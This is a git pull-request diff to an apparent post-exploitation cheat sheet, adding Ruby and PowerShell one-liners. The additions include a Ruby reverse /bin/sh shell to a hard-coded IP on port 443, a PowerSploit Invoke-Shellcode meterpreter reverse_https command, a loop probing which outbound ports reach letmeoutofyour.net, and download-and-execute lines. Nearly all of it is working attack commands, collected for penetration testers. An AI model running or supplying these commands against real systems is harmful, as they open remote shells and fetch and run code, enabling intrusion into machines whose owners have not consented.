Merge pull request #43 from jakxx/master

Updating powershell page to fix port enumeration false positives and add powersploit

Author: mubix

scripting/ruby.md

@@ -1,3 +1,12 @@
-# Place Holder
+# Ruby Command and Scripts for Post Exploitation
 
-Content coming. Feel free to submit ;-)
+One liners
+-----------
+
+**Start a web server that serves the local files from current directory on port 8001**
+
+```ruby -run -e httpd -- -p 8001 .```
+
+**Reverse /bin/sh shell on port 443**
+
+```ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```

windows/powershell.md

@@ -1,4 +1,7 @@
-# Windows Powershell Commands
+# Windows Powershell Commands and Scripts for Post Exploitation
+
+One liners
+-----------
 
 **Download and Execute Remote Powershell Script**
 
@@ -8,6 +11,11 @@
 
 ```(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')```
 
-**Enumerate Allowed Outbound Ports**
+**Enumerate Allowed Outbound Ports 1-1024**
+
+```$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); 
+$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}```
+
+**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)**
 
-```1..1024 | % {$test= new-object system.Net.Sockets.TcpClient; $wait = $test.beginConnect("letmeoutofyour.net",$_,$null,$null); ($wait.asyncwaithandle.waitone(250,$false)); if($test.Connected){echo "$_ is allowed out"}} | select-string "allowed"```
+```Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force```